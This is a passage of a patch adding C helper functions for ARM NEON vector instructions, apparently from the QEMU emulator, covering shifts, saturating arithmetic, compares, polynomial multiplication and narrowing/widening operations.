4) +NEON_VOP(hsub_s16, neon_s16, 2) +NEON_VOP(hsub_u16, neon_u16, 2) +#undef NEON_FN + +int32_t HELPER(neon_hsub_s32)(int32_t src1, int32_t src2) +{ + int32_t dest; + + dest = (src1 >> 1) - (src2 >> 1); + if ((~src1) & src2 & 1) + dest--; + return dest; +} + +uint32_t HELPER(neon_hsub_u32)(uint32_t src1, uint32_t src2) +{ + uint32_t dest; + + dest = (src1 >> 1) - (src2 >> 1); + if ((~src1) & src2 & 1) + dest--; + return dest; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? ~0 : 0 +NEON_VOP(cgt_s8, neon_s8, 4) +NEON_VOP(cgt_u8, neon_u8, 4) +NEON_VOP(cgt_s16, neon_s16, 2) +NEON_VOP(cgt_u16, neon_u16, 2) +NEON_VOP(cgt_s32, neon_s32, 1) +NEON_VOP(cgt_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 >= src2) ? ~0 : 0 +NEON_VOP(cge_s8, neon_s8, 4) +NEON_VOP(cge_u8, neon_u8, 4) +NEON_VOP(cge_s16, neon_s16, 2) +NEON_VOP(cge_u16, neon_u16, 2) +NEON_VOP(cge_s32, neon_s32, 1) +NEON_VOP(cge_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 < src2) ? 
src1 : src2 +NEON_VOP(min_s8, neon_s8, 4) +NEON_VOP(min_u8, neon_u8, 4) +NEON_VOP(min_s16, neon_s16, 2) +NEON_VOP(min_u16, neon_u16, 2) +NEON_VOP(min_s32, neon_s32, 1) +NEON_VOP(min_u32, neon_u32, 1) +NEON_POP(pmin_s8, neon_s8, 4) +NEON_POP(pmin_u8, neon_u8, 4) +NEON_POP(pmin_s16, neon_s16, 2) +NEON_POP(pmin_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? src1 : src2 +NEON_VOP(max_s8, neon_s8, 4) +NEON_VOP(max_u8, neon_u8, 4) +NEON_VOP(max_s16, neon_s16, 2) +NEON_VOP(max_u16, neon_u16, 2) +NEON_VOP(max_s32, neon_s32, 1) +NEON_VOP(max_u32, neon_u32, 1) +NEON_POP(pmax_s8, neon_s8, 4) +NEON_POP(pmax_u8, neon_u8, 4) +NEON_POP(pmax_s16, neon_s16, 2) +NEON_POP(pmax_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) \ + dest = (src1 > src2) ? ((int64_t)src1 - (int64_t)src2) : ((int64_t)src2 - (int64_t)src1) +NEON_VOP(abd_s8, neon_s8, 4) +NEON_VOP(abd_u8, neon_u8, 4) +NEON_VOP(abd_s16, neon_s16, 2) +NEON_VOP(abd_u16, neon_u16, 2) +NEON_VOP(abd_s32, neon_s32, 1) +NEON_VOP(abd_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8 || \ + tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + }} while (0) +NEON_VOP(shl_u8, neon_u8, 4) +NEON_VOP(shl_u16, neon_u16, 2) +NEON_VOP(shl_u32, neon_u32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_shl_u64)(uint64_t val, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + if (shift >= 64 || shift <= -64) { + val = 0; + } else if (shift < 0) { + val >>= -shift; + } else { + val <<= shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> (sizeof(src1) * 8 - 1); \ + } else if (tmp < 0) { \ + dest = src1 
>> -tmp; \ + } else { \ + dest = src1 << tmp; \ + }} while (0) +NEON_VOP(shl_s8, neon_s8, 4) +NEON_VOP(shl_s16, neon_s16, 2) +NEON_VOP(shl_s32, neon_s32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_shl_s64)(uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + uint64_t val = valop; + if (shift >= 64) { + val = 0; + } else if (shift <= -64) { + val >>= 63; + } else if (shift < 0) { + val >>= -shift; + } else { + val <<= shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if ((tmp >= (ssize_t)sizeof(src1) * 8) \ + || (tmp <= -(ssize_t)sizeof(src1) * 8)) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = (uint64_t)src1 << tmp; \ + }} while (0) +NEON_VOP(rshl_s8, neon_s8, 4) +NEON_VOP(rshl_s16, neon_s16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_rshl_s32)(uint32_t valop, uint32_t shiftop) +{ + uint32_t dest; + int32_t val = (int32_t)valop; + int8_t shift = (int8_t)shiftop; + if ((shift >= 32) || (shift <= -32)) { + dest = 0; + } else if (shift < 0) { + int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = (uint32_t)val << shift; + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_rshl_s64)(uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + int64_t val = valop; + if ((shift >= 64) || (shift <= -64)) { + val = 0; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == INT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. 
*/ + val = 0x4000000000000000LL; + } else { + val++; + val >>= 1; + } + } else { + val = ((uint64_t)val) << shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8 || \ + tmp < -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> (-tmp - 1); \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + }} while (0) +NEON_VOP(rshl_u8, neon_u8, 4) +NEON_VOP(rshl_u16, neon_u16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_rshl_u32)(uint32_t val, uint32_t shiftop) +{ + uint32_t dest; + int8_t shift = (int8_t)shiftop; + if (shift >= 32 || shift < -32) { + dest = 0; + } else if (shift == -32) { + dest = val >> 31; + } else if (shift < 0) { + uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = val << shift; + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_rshl_u64)(uint64_t val, uint64_t shiftop) +{ + int8_t shift = (uint8_t)shiftop; + if (shift >= 64 || shift < -64) { + val = 0; + } else if (shift == -64) { + /* Rounding a 1-bit result just preserves that bit. */ + val >>= 63; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == UINT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. 
*/ + val = 0x8000000000000000ULL; + } else { + val++; + val >>= 1; + } + } else { + val <<= shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = 0; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = ~0; \ + } \ + }} while (0) +NEON_VOP_ENV(qshl_u8, neon_u8, 4) +NEON_VOP_ENV(qshl_u16, neon_u16, 2) +NEON_VOP_ENV(qshl_u32, neon_u32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_qshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + if (shift >= 64) { + if (val) { + val = ~(uint64_t)0; + SET_QC(); + } + } else if (shift <= -64) { + val = 0; + } else if (shift < 0) { + val >>= -shift; + } else { + uint64_t tmp = val; + val <<= shift; + if ((val >> shift) != tmp) { + SET_QC(); + val = ~(uint64_t)0; + } + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = (uint32_t)(1U << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } else { \ + dest = src1; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> 31; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = (uint32_t)src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } \ + }} while (0) +NEON_VOP_ENV(qshl_s8, neon_s8, 4) +NEON_VOP_ENV(qshl_s16, neon_s16, 2) +NEON_VOP_ENV(qshl_s32, neon_s32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_qshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (uint8_t)shiftop; + uint64_t val = valop; + if 
(shift >= 64) { + if (val) { + SET_QC(); + val = (val >> 63) ^ ~SIGNBIT64; + } + } else if (shift <= -64) { + val >>= 63; + } else if (shift < 0) { + val >>= -shift; + } else { + int64_t tmp = val; + val <<= shift; + if ((val >> shift) != tmp) { + SET_QC(); + val = (tmp >> 63) ^ ~SIGNBIT64; + } + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + if (src1 & (1 << (sizeof(src1) * 8 - 1))) { \ + SET_QC(); \ + dest = 0; \ + } else { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = 0; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = ~0; \ + } \ + } \ + }} while (0) +NEON_VOP_ENV(qshlu_s8, neon_u8, 4) +NEON_VOP_ENV(qshlu_s16, neon_u16, 2) +#undef NEON_FN + +uint32_t HELPER(neon_qshlu_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) +{ + if ((int32_t)valop < 0) { + SET_QC(); + return 0; + } + return helper_neon_qshl_u32(env, valop, shiftop); +} + +uint64_t HELPER(neon_qshlu_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) +{ + if ((int64_t)valop < 0) { + SET_QC(); + return 0; + } + return helper_neon_qshl_u64(env, valop, shiftop); +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = 0; \ + } \ + } else if (tmp < -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> (sizeof(src1) * 8 - 1); \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = ~0; \ + } \ + }} while (0) +NEON_VOP_ENV(qrshl_u8, neon_u8, 4) +NEON_VOP_ENV(qrshl_u16, neon_u16, 2) +#undef NEON_FN + 
+/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_qrshl_u32)(CPUARMState *env, uint32_t val, uint32_t shiftop) +{ + uint32_t dest; + int8_t shift = (int8_t)shiftop; + if (shift >= 32) { + if (val) { + SET_QC(); + dest = ~0; + } else { + dest = 0; + } + } else if (shift < -32) { + dest = 0; + } else if (shift == -32) { + dest = val >> 31; + } else if (shift < 0) { + uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = val << shift; + if ((dest >> shift) != val) { + SET_QC(); + dest = ~0; + } + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_qrshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + if (shift >= 64) { + if (val) { + SET_QC(); + val = ~0; + } + } else if (shift < -64) { + val = 0; + } else if (shift == -64) { + val >>= 63; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == UINT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. 
*/ + val = 0x8000000000000000ULL; + } else { + val++; + val >>= 1; + } + } else { \ + uint64_t tmp = val; + val <<= shift; + if ((val >> shift) != tmp) { + SET_QC(); + val = ~0; + } + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = (uint32_t)(1U << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } else { \ + dest = 0; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = ((uint64_t)src1) << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = (uint32_t)(1U << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } \ + }} while (0) +NEON_VOP_ENV(qrshl_s8, neon_s8, 4) +NEON_VOP_ENV(qrshl_s16, neon_s16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_qrshl_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) +{ + int32_t dest; + int32_t val = (int32_t)valop; + int8_t shift = (int8_t)shiftop; + if (shift >= 32) { + if (val) { + SET_QC(); + dest = (val >> 31) ^ ~SIGNBIT; + } else { + dest = 0; + } + } else if (shift <= -32) { + dest = 0; + } else if (shift < 0) { + int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = val << shift; + if ((dest >> shift) != val) { + SET_QC(); + dest = (val >> 31) ^ ~SIGNBIT; + } + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. 
*/ +uint64_t HELPER(neon_qrshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (uint8_t)shiftop; + int64_t val = valop; + + if (shift >= 64) { + if (val) { + SET_QC(); + val = (val >> 63) ^ ~SIGNBIT64; + } + } else if (shift <= -64) { + val = 0; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == INT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. */ + val = 0x4000000000000000ULL; + } else { + val++; + val >>= 1; + } + } else { + int64_t tmp = val; + val = (uint64_t)val << (shift & 0x3f); + if ((val >> shift) != tmp) { + SET_QC(); + val = (tmp >> 63) ^ ~SIGNBIT64; + } + } + return val; +} + +uint32_t HELPER(neon_add_u8)(uint32_t a, uint32_t b) +{ + uint32_t mask; + mask = (a ^ b) & 0x80808080u; + a &= ~0x80808080u; + b &= ~0x80808080u; + return (a + b) ^ mask; +} + +uint32_t HELPER(neon_add_u16)(uint32_t a, uint32_t b) +{ + uint32_t mask; + mask = (a ^ b) & 0x80008000u; + a &= ~0x80008000u; + b &= ~0x80008000u; + return (a + b) ^ mask; +} + +#define NEON_FN(dest, src1, src2) dest = src1 + src2 +NEON_POP(padd_u8, neon_u8, 4) +NEON_POP(padd_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = src1 - src2 +NEON_VOP(sub_u8, neon_u8, 4) +NEON_VOP(sub_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (int64_t)src1 * src2 +NEON_VOP(mul_u8, neon_u8, 4) +NEON_VOP(mul_u16, neon_u16, 2) +#undef NEON_FN + +/* Polynomial multiplication is like integer multiplication except the + partial products are XORed, not added. 
*/ +uint32_t HELPER(neon_mul_p8)(uint32_t op1, uint32_t op2) +{ + uint32_t mask; + uint32_t result; + result = 0; + while (op1) { + mask = 0; + if (op1 & 1) + mask |= 0xff; + if (op1 & (1 << 8)) + mask |= (0xff << 8); + if (op1 & (1 << 16)) + mask |= (0xff << 16); + if (op1 & (1 << 24)) + mask |= (0xff << 24); + result ^= op2 & mask; + op1 = (op1 >> 1) & 0x7f7f7f7f; + op2 = (op2 << 1) & 0xfefefefe; + } + return result; +} + +uint64_t HELPER(neon_mull_p8)(uint32_t op1, uint32_t op2) +{ + uint64_t result = 0; + uint64_t mask; + uint64_t op2ex = op2; + op2ex = (op2ex & 0xff) | + ((op2ex & 0xff00) << 8) | + ((op2ex & 0xff0000) << 16) | + ((op2ex & 0xff000000) << 24); + while (op1) { + mask = 0; + if (op1 & 1) { + mask |= 0xffff; + } + if (op1 & (1 << 8)) { + mask |= (0xffffU << 16); + } + if (op1 & (1 << 16)) { + mask |= (0xffffULL << 32); + } + if (op1 & (1 << 24)) { + mask |= (0xffffULL << 48); + } + result ^= op2ex & mask; + op1 = (op1 >> 1) & 0x7f7f7f7f; + op2ex <<= 1; + } + return result; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 & src2) ? -1 : 0 +NEON_VOP(tst_u8, neon_u8, 4) +NEON_VOP(tst_u16, neon_u16, 2) +NEON_VOP(tst_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 == src2) ? -1 : 0 +NEON_VOP(ceq_u8, neon_u8, 4) +NEON_VOP(ceq_u16, neon_u16, 2) +NEON_VOP(ceq_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = (src < 0) ? -src : src +NEON_VOP1(abs_s8, neon_s8, 4) +NEON_VOP1(abs_s16, neon_s16, 2) +#undef NEON_FN + +/* Count Leading Sign/Zero Bits. 
*/ +static inline int do_clz8(uint8_t x) +{ + int n; + for (n = 8; x; n--) + x >>= 1; + return n; +} + +static inline int do_clz16(uint16_t x) +{ + int n; + for (n = 16; x; n--) + x >>= 1; + return n; +} + +#define NEON_FN(dest, src, dummy) dest = do_clz8(src) +NEON_VOP1(clz_u8, neon_u8, 4) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = do_clz16(src) +NEON_VOP1(clz_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = do_clz8((src < 0) ? ~src : src) - 1 +NEON_VOP1(cls_s8, neon_s8, 4) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = do_clz16((src < 0) ? ~src : src) - 1 +NEON_VOP1(cls_s16, neon_s16, 2) +#undef NEON_FN + +uint32_t HELPER(neon_cls_s32)(uint32_t x) +{ + int count; + if ((int32_t)x < 0) + x = ~x; + for (count = 32; x; count--) + x = x >> 1; + return count - 1; +} + +/* Bit count. */ +uint32_t HELPER(neon_cnt_u8)(uint32_t x) +{ + x = (x & 0x55555555) + ((x >> 1) & 0x55555555); + x = (x & 0x33333333) + ((x >> 2) & 0x33333333); + x = (x & 0x0f0f0f0f) + ((x >> 4) & 0x0f0f0f0f); + return x; +} + +/* Reverse bits in each 8 bit word */ +uint32_t HELPER(neon_rbit_u8)(uint32_t x) +{ + x = ((x & 0xf0f0f0f0) >> 4) + | ((x & 0x0f0f0f0f) << 4); + x = ((x & 0x88888888) >> 3) + | ((x & 0x44444444) >> 1) + | ((x & 0x22222222) << 1) + | ((x & 0x11111111) << 3); + return x; +} + +#define NEON_QDMULH16(dest, src1, src2, round) do { \ + uint32_t tmp = (int32_t)(int16_t) src1 * (int16_t) src2; \ + if ((tmp ^ (tmp << 1)) & SIGNBIT) { \ + SET_QC(); \ + tmp = (tmp >> 31) ^ ~SIGNBIT; \ + } else { \ + tmp <<= 1; \ + } \ + if (round) { \ + int32_t old = tmp; \ + tmp += 1 << 15; \ + if ((int32_t)tmp < old) { \ + SET_QC(); \ + tmp = SIGNBIT - 1; \ + } \ + } \ + dest = tmp >> 16; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 0) +NEON_VOP_ENV(qdmulh_s16, neon_s16, 2) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 1) +NEON_VOP_ENV(qrdmulh_s16, neon_s16, 2) +#undef 
NEON_FN +#undef NEON_QDMULH16 + +#define NEON_QDMULH32(dest, src1, src2, round) do { \ + uint64_t tmp = (int64_t)(int32_t) src1 * (int32_t) src2; \ + if ((tmp ^ (tmp << 1)) & SIGNBIT64) { \ + SET_QC(); \ + tmp = (tmp >> 63) ^ ~SIGNBIT64; \ + } else { \ + tmp <<= 1; \ + } \ + if (round) { \ + int64_t old = tmp; \ + tmp += (int64_t)1 << 31; \ + if ((int64_t)tmp < old) { \ + SET_QC(); \ + tmp = SIGNBIT64 - 1; \ + } \ + } \ + dest = tmp >> 32; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 0) +NEON_VOP_ENV(qdmulh_s32, neon_s32, 1) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 1) +NEON_VOP_ENV(qrdmulh_s32, neon_s32, 1) +#undef NEON_FN +#undef NEON_QDMULH32 + +uint32_t HELPER(neon_narrow_u8)(uint64_t x) +{ + return (x & 0xffu) | ((x >> 8) & 0xff00u) | ((x >> 16) & 0xff0000u) + | ((x >> 24) & 0xff000000u); +} + +uint32_t HELPER(neon_narrow_u16)(uint64_t x) +{ + return (x & 0xffffu) | ((x >> 16) & 0xffff0000u); +} + +uint32_t HELPER(neon_narrow_high_u8)(uint64_t x) +{ + return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) + | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); +} + +uint32_t HELPER(neon_narrow_high_u16)(uint64_t x) +{ + return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); +} + +uint32_t HELPER(neon_narrow_round_high_u8)(uint64_t x) +{ + x &= 0xff80ff80ff80ff80ull; + x += 0x0080008000800080ull; + return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) + | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); +} + +uint32_t HELPER(neon_narrow_round_high_u16)(uint64_t x) +{ + x &= 0xffff8000ffff8000ull; + x += 0x0000800000008000ull; + return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); +} + +uint32_t HELPER(neon_unarrow_sat8)(CPUARMState *env, uint64_t x) +{ + uint16_t s; + uint8_t d; + uint32_t res = 0; +#define SAT8(n) \ + s = x >> n; \ + if (s & 0x8000) { \ + SET_QC(); \ + } else { \ + if (s > 0xff) { \ + d = 0xff; \ + SET_QC(); \ + } else { \ + d = s; \ + } \ + res |= (uint32_t)d << (n / 2); \ 
+ } + + SAT8(0); + SAT8(16); + SAT8(32); + SAT8(48); +#undef SAT8 + return res; +} + +uint32_t HELPER(neon_narrow_sat_u8)(CPUARMState *env, uint64_t x) +{ + uint16_t s; + uint8_t d; + uint32_t res = 0; +#define SAT8(n) \ + s = x >> n; \ + if (s > 0xff) { \ + d = 0xff; \ + SET_QC(); \ + } else { \ + d = s; \ + } \ + res |= (uint32_t)d << (n / 2); + + SAT8(0); + SAT8(16); + SAT8(32); + SAT8(48); +#undef SAT8 + return res; +} + +uint32_t HELPER(neon_narrow_sat_s8)(CPUARMState *env, uint64_t x) +{ + int16_t s; + uint8_t d; + uint32_t res = 0; +#define SAT8(n) \ + s = x >> n; \ + if (s != (int8_t)s) { \ + d = (s >> 15) ^ 0x7f; \ + SET_QC(); \ + } else { \ + d = s; \ + } \ + res |= (uint32_t)d << (n / 2); + + SAT8(0); + SAT8(16); + SAT8(32); + SAT8(48); +#undef SAT8 + return res; +} + +uint32_t HELPER(neon_unarrow_sat16)(CPUARMState *env, uint64_t x) +{ + uint32_t high; + uint32_t low; + low = x; + if (low & 0x80000000) { + low = 0; + SET_QC(); + } else if (low > 0xffff) { + low = 0xffff; + SET_QC(); + } + high = x >> 32; + if (high & 0x80000000) { + high = 0; + SET_QC(); + } else if (high > 0xffff) { + high = 0xffff; + SET_QC(); + } + return low | (high << 16); +} + +uint32_t HELPER(neon_narrow_sat_u16)(CPUARMState *env, uint64_t x) +{ + uint32_t high; + uint32_t low; + low = x; + if (low > 0xffff) { + low = 0xffff; + SET_QC(); + } + high = x >> 32; + if (high > 0xffff) { + high = 0xffff; + SET_QC(); + } + return low | (high << 16); +} + +uint32_t HELPER(neon_narrow_sat_s16)(CPUARMState *env, uint64_t x) +{ + int32_t low; + int32_t high; + low = x; + if (low != (int16_t)low) { + low = (low >> 31) ^ 0x7fff; + SET_QC(); + } + high = x >> 32; + if (high != (int16_t)high) { + high = (high >> 31) ^ 0x7fff; + SET_QC(); + } + return (uint16_t)low | (high << 16); +} + +uint32_t HELPER(neon_unarrow_sat32)(CPUARMState *env, uint64_t x) +{ + if (x & 0x8000000000000000ull) { + SET_QC(); + return 0; + } + if (x > 0xffffffffu) { + SET_QC(); + return 0xffffffffu; + } + return x; +} + 
+uint32_t HELPER(neon_narrow_sat_u32)(CPUARMState *env, uint64_t x) +{ + if (x > 0xffffffffu) { + SET_QC(); + return 0xffffffffu; + } + return x; +} + +uint32_t HELPER(neon_narrow_sat_s32)(CPUARMState *env, uint64_t x) +{ + if ((int64_t)x != (int32_t)x) { + SET_QC(); + return ((int64_t)x >> 63) ^ 0x7fffffff; + } + return x; +} + +uint64_t HELPER(neon_widen_u8)(uint32_t x) +{ + uint64_t tmp; + uint64_t ret; + ret = (uint8_t)x; + tmp = (uint8_t)(x >> 8); + ret |= tmp << 16; + tmp = (uint8_t)(x >> 16); + ret |= tmp << 32; + tmp = (uint8_t)(x >> 24); + ret |= tmp << 48; + return ret; +} + +uint64_t HELPER(neon_widen_s8)(uint32_t x) +{ + uint64_t tmp; + uint64_t ret; + ret = (uint16_t)(int8_t)x; + tmp = (uint16_t)(int8_t)(x >> 8); + ret |= tmp << 16; + tmp = (uint16_t)(int8_t)(x >> 16); + ret |= tmp << 32; + tmp = (uint16_t)(int8_t)(x >> 24); + ret |= tmp << 48; + return ret; +} + +uint64_t HELPER(neon_widen_u16)(uint32_t x) +{ + uint64_t high = (uint16_t)(x >> 16); + return ((uint16_t)x) | (high << 32); +} + +uint64_t HELPER(neon_widen_s16)(uint32_t x) +{ + uint64_t high = (int16_t)(x >> 16); + return ((uint32_t)(int16_t)x) | (high << 32); +} + +uint64_t HELPER(neon_addl_u16)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ b) & 0x8000800080008000ull; + a &= ~0x8000800080008000ull; + b &= ~0x8000800080008000ull; + return (a + b) ^ mask; +} + +uint64_t HELPER(neon_addl_u32)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ b) & 0x8000000080000000ull; + a &= ~0x8000000080000000ull; + b &= ~0x8000000080000000ull; + return (a + b) ^ mask; +} + +uint64_t HELPER(neon_paddl_u16)(uint64_t a, uint64_t b) +{ + uint64_t tmp; + uint64_t tmp2; + + tmp = a & 0x0000ffff0000ffffull; + tmp += (a >> 16) & 0x0000ffff0000ffffull; + tmp2 = b & 0xffff0000ffff0000ull; + tmp2 += (b << 16) & 0xffff0000ffff0000ull; + return ( tmp & 0xffff) + | ((tmp >> 16) & 0xffff0000ull) + | ((tmp2 << 16) & 0xffff00000000ull) + | ( tmp2 & 0xffff000000000000ull); +} + +uint64_t 
